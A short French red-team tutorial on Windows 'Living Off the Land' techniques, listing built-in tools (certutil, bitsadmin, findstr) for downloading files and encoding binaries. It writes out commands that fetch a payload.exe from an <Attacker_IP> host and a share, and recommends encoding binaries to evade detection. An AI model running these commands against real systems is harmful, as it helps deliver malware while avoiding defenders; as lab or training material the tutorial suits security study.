[Windows] Living Off the Land
Introduction
Le terme de Living Off The Land signifie se débrouiller avec les moyens du bord et donc avec les outils déjà présents dans notre contexte pour du Red teaming.
L'intérêt d'utiliser des outils déjà présent sont multiples :
- Ne pas éveiller les soupçons.
- L'utilisation d'outils externe est impossible pour une raison quelconque.
LOLBAS
Ce projet réunis les techniques et outils de Living Off The Land :
Manuel
Télécharger un fichier depuis un serveur HTTP
Il est possible de télécharger un fichier avec certutil.exe bien qu'il soit initialement conçu pour gérer les certificats sur Windows :
certutil -URLcache -split -f <URL> <OUTPUT>
Vous pouvez aussi utiliser BitsAdmin :
bitsadmin.exe /transfer /Download /priority Foreground http://<Attacker_IP>/payload.exe c:\Users\thm\Desktop\payload.exe
Télécharger un fichier depuis un serveur SMB
Grâce à l'outil findstr, il est possible de télécharger un fichier depuis un partage samba :
findstr /V dummystring \\MachineName\ShareFolder\test.exe > c:\Windows\Temp\test.exe
dummystring correspond à une chaîne non présente dans le fichier recherché.
Encoder un fichier
Avec certutil, on peut encoder un fichier et le rendre bien plus difficile à détecter :
certutil -encode <INPUT_FILE> <OUTPUT_ENCODED_FILE>
Vous pouvez encoder vos binaires de cette façon.